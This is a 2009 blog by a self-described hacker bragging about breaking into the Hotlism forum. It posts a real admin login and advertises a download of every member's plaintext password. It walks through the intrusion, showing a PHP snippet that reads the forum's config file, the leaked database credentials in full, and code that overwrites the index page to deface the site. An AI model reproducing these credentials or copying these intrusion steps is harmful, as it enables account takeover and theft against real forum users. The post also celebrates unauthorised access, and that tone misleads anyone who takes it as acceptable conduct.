I hacked hotlism doesnt mean it ends there. "hacking" is my hobby and I really cant give it up. Today i give you, my friends, one of the admin accounts of hotlism forum. How i did it or when and where i did it are all confidential information. Please dont try to retrieve them and if you are the first to see this post, please dont reset the password!
UserName: mock
PassWord: zamnazaman
It was a hard job but at the end worth while and fun. Since I have done enough damage to hotlism already, I dont intend on doing anymore myself right now. So enjoy. and dont tell mock that I stole his password.
>>> I am a skiddy. so never mind me or what i do <<<
Friday, February 20, 2009
Friday, February 6, 2009
Interesting finds in the database
DOWNLOAD ALL USERS AND THEIR PLAIN PASSWORDS HERE
I had a lot of respect for the cool people who ran hotlism until last night. I finally thought i would see whats in their database and what i saw was shocking. hotlism team seems to be spying on everybodys password :O. Passwords are stored as hashes in the database in most of the web applications including IPB. This is to protect users from being exploited if the database ever got exposed, like in this situation. Hotlism guys thought if they knew what some guy was typing as a password for their forum and if they got lucky the same guy will have the same password for his hotmail account or some other account elsewhere. So they were storing plain text versions of the user password on their database. (in the members_converge table to be more precise).
I immediately made a post on hotlism saying they did this, and before their users learnt this truth, they banned me and deleted my post.
Now when i think of this, i should have logged in from each user and deleted all their posts or did all sorts of funky stuff. Last night they have changed all the users passwords to some unknown value and are asking users to either reset it or ask an admin to reset it for them. I wonder if i can make an account voodoo@live.com and get this account now? This is all bullshit.
People of hotlism, you broke the whole chain of trust between your users and the team when you decided to store their passwords in plain text versions so you can view them and use it for your personal gains. I hope you do say sorry and this is one of those situations where sorry really isnt enough.
A list of all users and their passwords can be downloaded from over here. They are stored in the form id : username : password
I had a lot of respect for the cool people who ran hotlism until last night. I finally thought i would see whats in their database and what i saw was shocking. hotlism team seems to be spying on everybodys password :O. Passwords are stored as hashes in the database in most of the web applications including IPB. This is to protect users from being exploited if the database ever got exposed, like in this situation. Hotlism guys thought if they knew what some guy was typing as a password for their forum and if they got lucky the same guy will have the same password for his hotmail account or some other account elsewhere. So they were storing plain text versions of the user password on their database. (in the members_converge table to be more precise).
I immediately made a post on hotlism saying they did this, and before their users learnt this truth, they banned me and deleted my post.
Now when i think of this, i should have logged in from each user and deleted all their posts or did all sorts of funky stuff. Last night they have changed all the users passwords to some unknown value and are asking users to either reset it or ask an admin to reset it for them. I wonder if i can make an account voodoo@live.com and get this account now? This is all bullshit.
People of hotlism, you broke the whole chain of trust between your users and the team when you decided to store their passwords in plain text versions so you can view them and use it for your personal gains. I hope you do say sorry and this is one of those situations where sorry really isnt enough.
A list of all users and their passwords can be downloaded from over here. They are stored in the form id : username : password
how we hacked hotlism
Maldivian forums were all about hacking and being hacked to prove each others superiority. Hotlism was one of the remaining virgins on the market who was yet to be raped. Since it was to happen and somebody was going to take the initiative I thought why not me? Running a background check on Hotlism revealed that it had lots of security aware people on its team. This made everything though and look impossible. So I formed a 50 50 partnership with ProxyGod.
We neither have nor had anything agaisnt Hotlism expect for them and their users boasting too much about them not being hacked and being "UNHACKABLE". After a few days of look around proxy god managed to break into one of the blogs hosted on hotlism ( rezorn.hotlism.org ) Anyways, he broke in and immediately passed the info on to me.
Primarily i uploaded a shell to their server. but guess what? It didnt work. They seemed to be using .htaccess files to cut off calls from files that looks like shells. Here is what i got.
Then I gave up on that shell and wrote a file on their server with the following contents.
echo file_get_contents('/forums/conf_global.php');
?>
and woodaa. I got a plain text version of their database details which were:
$INFO['use_eaccelerator'] = 1;
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'localhost';
$INFO['sql_database'] = 'vpshotli_hotlism';
$INFO['sql_user'] = 'vpshotli_fuck';
$INFO['sql_pass'] = 'fuckfest';
$INFO['sql_tbl_prefix'] = 'ibf_';
$INFO['sql_debug'] = '1';
$INFO['board_start'] = '1213218696';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://hotlism.org/forums';
$INFO['banned_group'] = '5';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
?>
with that, i immediately dumped their database and downloaded it ( thinking it might come in handy later ). After that I simply wrote a new file to their server with the following contents and ran it.
$defaced = <<
html;
file_put_contents('/forums/index.php', $defaced);
?>
That easily defaced them. Now all that was left was to include a shoutbox to see who was in on the fun. but we did it a little late it seems. Hotlism guys somehow managed to suspend their own account - everything was gone including the virginity of hotlism. and that was the story of how me and proxygod hacked hotlism.
Subscribe to:
Comments (Atom)